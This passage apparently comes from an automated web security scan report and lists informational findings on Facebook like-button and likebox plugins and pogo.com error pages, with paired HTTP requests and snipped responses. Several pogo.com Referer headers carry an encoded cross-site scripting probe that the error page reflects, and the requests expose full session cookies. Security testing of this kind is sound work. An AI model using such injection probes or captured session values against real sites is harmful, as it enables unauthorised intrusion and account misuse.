Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: max-age=300
Content-Type: text/html
Date: Fri, 24 Jun 2011 13:46:14 GMT
Expires: Fri, 24 Jun 2011 13:51:14 GMT
Server: ECS (dca/53C5)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>
16.4. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?api_key=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162b01ba%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fphuket.com%2F&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.1.58
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 7909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4e048f26dbdaa1158522861" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Phuket Hotels &amp; Travel Guide - Phuket Hotels and Tourist Information</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 2,119 others like this.</span><span class="connect_widget_not_connected_text">2119 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=phuket.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fphuket.com%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connec
...[SNIP]...

Request 2

GET /plugins/like.php?api_key=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162b01ba%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fphuket.com%2F&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.246.44
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:55 GMT
Content-Length: 7840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4e048f37345826e53121345" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Phuket Hotels &amp; Travel Guide - Phuket Hotels and Tourist Information</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 2,119 others like this.</span><span class="connect_widget_not_connected_text">2119 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nb
...[SNIP]...
16.5. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.216.41
X-Cnection: close
Date: Fri, 24 Jun 2011 13:32:35 GMT
Content-Length: 9136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4e0491f30b7b45971053562" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">2,259,275</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span
...[SNIP]...

Request 2

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.18.46
X-Cnection: close
Date: Fri, 24 Jun 2011 13:32:56 GMT
Content-Length: 9061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4e049208e40971652065222" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">2,259,277</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span
...[SNIP]...
16.6. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /login/Scripts/AC_RunActiveContent.js

Request 1

GET /login/Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922690996-New%7C1311514690996%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response 1

HTTP/1.1 404 /login/Scripts/AC_RunActiveContent.js
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:23 GMT
Server: Apache-Coyote/1.1
Content-Length: 4347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
nkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>

Request 2

GET /login/Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922690996-New%7C1311514690996%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response 2

HTTP/1.1 404 /login/Scripts/AC_RunActiveContent.js
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:23 GMT
Server: Apache-Coyote/1.1
Content-Length: 4013


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
nkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/login/Scripts/AC_RunActiveContent.js";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>

16.7. http://www.pogo.com/login/media/Pogo_General_LP_2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /login/media/Pogo_General_LP_2.swf

Request 1

GET /login/media/Pogo_General_LP_2.swf HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922705451-New%7C1311514705451%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response 1

HTTP/1.1 404 /login/media/Pogo_General_LP_2.swf
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 4347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
nkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>

Request 2

GET /login/media/Pogo_General_LP_2.swf HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
